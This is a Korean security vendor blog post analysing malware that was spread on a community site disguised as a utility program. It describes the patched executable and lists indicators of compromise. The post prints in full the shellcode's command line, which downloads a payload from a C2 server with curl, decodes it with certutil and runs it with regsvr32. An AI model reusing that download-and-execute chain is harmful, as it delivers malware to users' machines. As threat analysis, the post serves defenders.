본문 바로가기
악성코드 정보

국내 인터넷 커뮤니티 사이트에서 악성코드 유포 (유틸리티 위장)

by 알 수 없는 사용자 2020. 7. 23.

ASEC 분석팀에서는 7월 23일 국내 유명 커뮤니티의 자료실에서 유틸리티 프로그램을 위장한 악성코드가 유포 중인 것을 확인하였다. 공격자는 공식 홈페이지에서 배포 중인 유틸리티의 실행파일에 악성 쉘 코드를 삽입 후 실행 흐름을 변조하는 방법으로 악성코드를 제작하였다. (정상파일의 빈 공간에 악의적 코드 삽입) 이번에 확인된 악성코드의 동작방식은 7월 15일에 '코로나 예측 결과' 위장하여 유포된 엑셀문서 악성코드(https://asec.ahnlab.com/1355) 사례와 유사한 것으로 확인되었다.

 

[그림1] 커뮤니티 사이트 게시물

 

자료실의 유틸리티 항목에 다음과 같이 첨부파일을 포함한 게시글을 업로드하였다. 해당 게시글은 특정 유틸리티 프로그램을 소개하는 내용으로 이루어져 있으며 첨부파일 내부에는 악성코드가 존재한다.

 

[그림2] 악성코드 유포 첨부파일

 

 

첨부파일 내부의 실행파일에는 공식 홈페이지에서 배포 중인 원본 파일과는 다르게 “.ireloc” 이름의 섹션이 추가되어 있으며 실행 권한을 가지고 있다.

 

[그림3] 추가된 .ireloc 섹션

 

(좌) 악성파일, (우) 정상파일

 

해당 섹션에는 악성 쉘 코드가 존재하며, 추가적으로  EntryPoint 근처의 Call 명령어의 주소가 변조되어 있어 파일 실행 시 쉘 코드를 실행 후 원래의 코드를 실행하게 된다.

 

[그림4] 좌: 원본 코드 우: 변조된 코드

 

이와 같이 실행 흐름을 변조하여 악성코드를 실행하기 때문에 원본 유틸리티 프로그램은 정상적으로 실행되며, 내부적으로 악성 스레드가 동작하여 사용자가 악성코드 감염을 인지하기 어렵다.

 

[그림5] 정상 실행 된 유틸리티

 

악성 쉘 코드는 추가 스레드를 생성하며 WinExec() 함수를 통해 다음 명령어를 실행한다.

 

[그림6] 악성 CMD 명령어 실행

"cmd.exe /c cd /d \"%temp%\"&curl https://byliny.bionebe[.]cz/wp-content/uploads/et_temp/chimps/90f80-08-230-sf0800.php -o a.b&certutil -decode a.b acview.dll&del a.b&regsvr32 /s acview.dll"

해당 명령어가 실행되면 C2에 접속하여 파일을 다운받아 디코딩 후 %Temp% 디렉토리에 "acview.dll" 파일명으로 저장한 뒤 regsvr32를 통해 실행하게 된다. 다운로드 되는 acview.dll 샘플은 특정 URL에 접근하는 행위를 하지만 현재 접속이 되지 않는 상태이다.

 

위와 같은 명령어 패턴은 기존에 분석된 한글 취약점, 엑셀 매크로 등 문서파일을 통해 악성코드를 유포하는 과정에서 사용되는 패턴과 일치한다. (https://asec.ahnlab.com/1355) 이러한 점을 바탕으로 이번 사례도 동일한 제작자에 의한 것으로 추정된다.

[그림7] 악성 문서를 통해 감염되는 과정에서의 명령어

 

 

코로나 예측 결과 위장 악성 문서(xls) 유포 중

올해 코로나 관련된 주제의 악성코드가 끊임없이 발견되고 있는 가운데 이번에도 ASEC 분석팀에서는 '코로나 예측 결과'에 대한 내용으로 사용자를 속여 메일과 문서를 열람하도록한 공격을 확��

asec.ahnlab.com

 

이와 같이 커뮤니티의 자료실을 통한 악성코드 유포 사례가 자주 보고되고 있으므로 사용자의 주의가 필요하다. 프로그램의 경우 반드시 공식 홈페이지를 통하여 다운로드하는 것을 권장한다. 현재 V3 제품에서는 관련 파일 및 URL에 대하여 아래의 진단명으로 탐지 및 차단하고 있다.

 

 

[IOC 정보]

 

[C2]

  • hxxps://byliny.bionebe[.]cz/wp-content/uploads/et_temp/chimps/90f80-08-230-sf0800.php
  • hxxp://www.trebat[.]co/wp-content/uploads/2018/03/new-blue-container.jpg

[MD5]

  • aa0337a0f2fd50a5a84210a16a1ad065
  • a3011709c1493863856a0f67641ec598

[V3 진단명]

  • Trojan/Win64.Patched
  • Backdoor/Win64.Akdoor

 

댓글